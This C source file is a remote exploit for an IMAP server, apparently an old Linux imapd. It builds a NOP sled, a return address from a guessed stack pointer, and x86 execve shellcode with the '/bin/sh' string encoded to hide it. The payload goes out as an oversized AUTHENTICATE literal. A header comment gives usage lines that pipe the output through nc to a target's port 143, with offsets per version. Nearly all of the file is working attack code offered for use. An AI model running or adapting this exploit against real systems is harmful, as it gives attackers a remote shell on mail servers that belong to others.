/*----------imap3----------------------------------------------
(./imap3 -1000;cat )|./nc ip 143          10.233 = -1000
(./imap3 -500;cat )|./nc ip 143           10.205 = -500
(./imap3 0;cat)|./nc ip 143               10.203 = 0     
(./imap3 0;cat)|./nc ip 143               10.196 = 0
(./imap3 0;cat)|./nc ip 143               10.190 = 0
(./imap3 -1000;cat )|./nc ip 143          10.166 = -1000
(./imap3 -1500;cat )|./nc ip 143          9.0    = -1500/-1000
--------------------------------------------------------------*/

#include<stdio.h>
#include<stdlib.h>

#define OFFSET                            0
#define RET_POSITION                   1032
#define RANGE                            20
#define NOP                            0x90

char shellcode[1024]=
        "\xeb\x38"                      /* jmp 0x38             */
        "\x5e"                          /* popl %esi            */
        "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi) */
        "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi) */
        "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi) */
        "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi) */
        "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi) */
        "\x89\xf0"                      /* movl %esi,%eax       */
        "\x83\xc0\x08"                  /* addl $0x8,%eax       */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
        "\x31\xc0"                      /* xorl %eax,%eax       */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
        "\xb0\x0b"                      /* movb $0xb,%al        */
        "\x89\xf3"                      /* movl %esi,%ebx       */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
        "\xcd\x80"                      /* int $0x80            */
        "\x31\xdb"                      /* xorl %ebx,%ebx       */
        "\x89\xd8"                      /* movl %ebx,%eax       */
        "\x40"                          /* inc %eax             */
        "\xcd\x80"                      /* int $0x80            */
        "\xe8\xc3\xff\xff\xff"          /* call -0x3d           */
        "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"    */ /*
/bin/sh is disguised */

void main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+1],*ptr;
        long *addr_ptr,addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
        int i;

        if(argc>1)
                offset=atoi(argv[1]);

        sp=0xbffff29f;
        addr=sp-offset;

        ptr=buff;
        addr_ptr=(long*)ptr;
        for(i=0;i<bsize;i+=4)
                *(addr_ptr++)=addr;

        for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
                buff[i]=NOP;

        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("* AUTHENTICATE {%d}\r\n",bsize);
        for(i=0;i<bsize;i++)
                putchar(buff[i]);
        printf("\r\n");
}